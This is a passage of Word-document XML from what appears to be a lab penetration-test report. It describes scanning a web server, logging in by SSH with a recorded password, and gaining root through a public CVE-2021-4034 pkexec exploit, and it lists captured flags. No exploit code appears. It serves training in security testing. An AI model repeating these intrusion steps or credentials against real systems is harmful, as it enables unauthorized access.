    <w:p w14:paraId="48C64210" w14:textId="6E1661F7" w:rsidR="00220DD3" w:rsidRDefault="00E247F9" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="1AF63D80" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Privilege Escalation on the Web Server</w:t>
      </w:r>
    </w:p>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3000"/>
        <w:gridCol w:w="6345"/>
      </w:tblGrid>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="44E572D9" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:trHeight w:val="225"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="934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Mar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="19010EBB" w14:textId="48109FBC" w:rsidR="1D8F7EFF" w:rsidRDefault="008F62ED" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
            <w:r w:rsidR="1D8F7EFF" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t xml:space="preserve"> RISK (</w:t>
            </w:r>
            <w:r w:rsidR="00E247F9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="1D8F7EFF" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="01A60023" w14:textId="77777777" w:rsidTr="1D8F7EFF">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2557EABF" w14:textId="49FE7067" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exploitation Likelihood</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45558781" w14:textId="15520294" w:rsidR="1B7A6FA2" w:rsidRDefault="00201CBD" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="28675DDA" w14:textId="77777777" w:rsidTr="1D8F7EFF">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61C52204" w14:textId="21C538C7" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Business Impact</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2B57F6EE" w14:textId="35435DEC" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="088E2543" w14:textId="77777777" w:rsidTr="1D8F7EFF">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36317933" w14:textId="42747980" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Remediation Difficulty</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1FD83855" w14:textId="546A6942" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56284202" w14:textId="649CA773" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E51A6CF" w14:textId="7D70421B" w:rsidR="00220DD3" w:rsidRDefault="1AF63D80" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B535D1C" w14:textId="7C45D0B2" w:rsidR="00220DD3" w:rsidRDefault="1AF63D80" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>During the initial NMAP Scan, it showed the port 443 was the SSH server</w:t>
      </w:r>
      <w:r w:rsidR="001E2E12">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the nbnwebserver. The command used for the NMAP scan was: </w:t>
      </w:r>
      <w:r w:rsidR="001E2E12" w:rsidRPr="001E2E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo nmap -sV -O -p- 10.10.0.66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A9B782" w14:textId="356941A5" w:rsidR="00220DD3" w:rsidRDefault="1AF63D80" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CD193D1" wp14:editId="54512A74">
            <wp:extent cx="5322627" cy="3041374"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="2944934" name="Picture 294493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b="9026"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5330384" cy="3045807"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4869D64C" w14:textId="5A22867F" w:rsidR="00220DD3" w:rsidRDefault="1AF63D80" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 7</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: Results of the NMAP scan</w:t>
      </w:r>
      <w:r w:rsidR="4F4341F4" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> on nbnwebserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5787E492" w14:textId="62BDE491" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10993F43" w14:textId="4F2E3A8B" w:rsidR="00220DD3" w:rsidRDefault="1AF63D80" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">A connection was made to the server via the following command: </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -p 443 </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gibson@10.10.0.66.</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Using “</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>digital”</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the password, the SSH connection into the server was successfully made. Sensitive files were able to be accessed such was the flag3 file which was recorded to be </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>flag3{brilliantly_lit_boulevard}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6355A6D6" w14:textId="11DC4CD8" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7434DC8F" w14:textId="579F43A4" w:rsidR="00220DD3" w:rsidRDefault="1AF63D80" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4287D19D" wp14:editId="6371255A">
            <wp:extent cx="3945835" cy="2912633"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1266457958" name="Picture 12664579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12848" r="1174" b="8508"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3958424" cy="2921926"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59421194" w14:textId="1162F89A" w:rsidR="00220DD3" w:rsidRDefault="1AF63D80" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 7</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: Authenticating into SSH server through Gibson</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BE3F73" w14:textId="451E1B67" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07277469" w14:textId="3EA7FD6D" w:rsidR="00220DD3" w:rsidRDefault="1AF63D80" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">After authenticating as gibson, the version of Linux was found to be </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>18.04.2 LTS</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> by running </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>cat /etc/os-release.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5876A2C4" w14:textId="425A3870" w:rsidR="00220DD3" w:rsidRDefault="1AF63D80" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E1D7941" wp14:editId="105DAB80">
            <wp:extent cx="3714750" cy="2419350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="433147278" name="Picture 43314727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14750" cy="2419350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BABCCDD" w14:textId="273AFF42" w:rsidR="00220DD3" w:rsidRDefault="1AF63D80" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 8</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: Linux Version of webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F1CF9C" w14:textId="50923545" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6105D383" w14:textId="21FAAE95" w:rsidR="00220DD3" w:rsidRDefault="1AF63D80" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an outdated version of Linux and is vulnerable to privilege escalation. One popular known exploit used for privilege escalation that affects this version of Linux is </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-4034. </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-4034 exploits the polkit’s pkexec utility to gain root privileges. A public python exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>of this vulnerability was found on github</w:t>
      </w:r>
      <w:r w:rsidR="7ECE0C51" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. This exploit was uploaded onto the server </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>and was successful in gaining root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAA3116" w14:textId="44B6B9F1" w:rsidR="00220DD3" w:rsidRDefault="1AF63D80" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68340F28" wp14:editId="1B7A32CA">
            <wp:extent cx="5915025" cy="2257425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="711400529" name="Picture 7114005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15025" cy="2257425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 9</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: Privilege Escalation of Web Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C57FA1" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CBE9380" w14:textId="7B0DED15" w:rsidR="00220DD3" w:rsidRDefault="006A08E8" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A08E8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45740288" wp14:editId="40AE555F">
            <wp:extent cx="5943600" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="48675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52014" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1988820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB8F75A" w14:textId="4BF60EE9" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 9</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>: Privilege Escalation of Web Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5390FC44" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA48447" w14:textId="2F684E05" w:rsidR="00220DD3" w:rsidRPr="006A08E8" w:rsidRDefault="1AF63D80" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Once root was granted, the attacker can gain full control of the </w:t>
      </w:r>
      <w:r w:rsidR="2B3BC04E" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>nbnweb</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>server. The flag</w:t>
      </w:r>
      <w:r w:rsidR="006A08E8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>s that</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> w</w:t>
      </w:r>
      <w:r w:rsidR="006A08E8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ere</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> retrieved </w:t>
      </w:r>
      <w:r w:rsidR="006A08E8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>flag4{youre_going_places}</w:t>
      </w:r>
      <w:r w:rsidR="006A08E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A08E8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="006A08E8" w:rsidRPr="006A08E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag5{weve_always_done_it_this_way}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684BD3B7" w14:textId="2033ED43" w:rsidR="00220DD3" w:rsidRDefault="00220DD3" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A54B51B" w14:textId="7562EFEB" w:rsidR="00220DD3" w:rsidRDefault="00E247F9" w:rsidP="1D8F7EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="097002BE" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> –Privilege Escalation on nbnclient </w:t>
      </w:r>
    </w:p>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3000"/>
        <w:gridCol w:w="6345"/>
      </w:tblGrid>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="412BFE02" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:trHeight w:val="225"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="934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Mar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="50DC17BF" w14:textId="6B6B5695" w:rsidR="1D8F7EFF" w:rsidRDefault="008F62ED" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
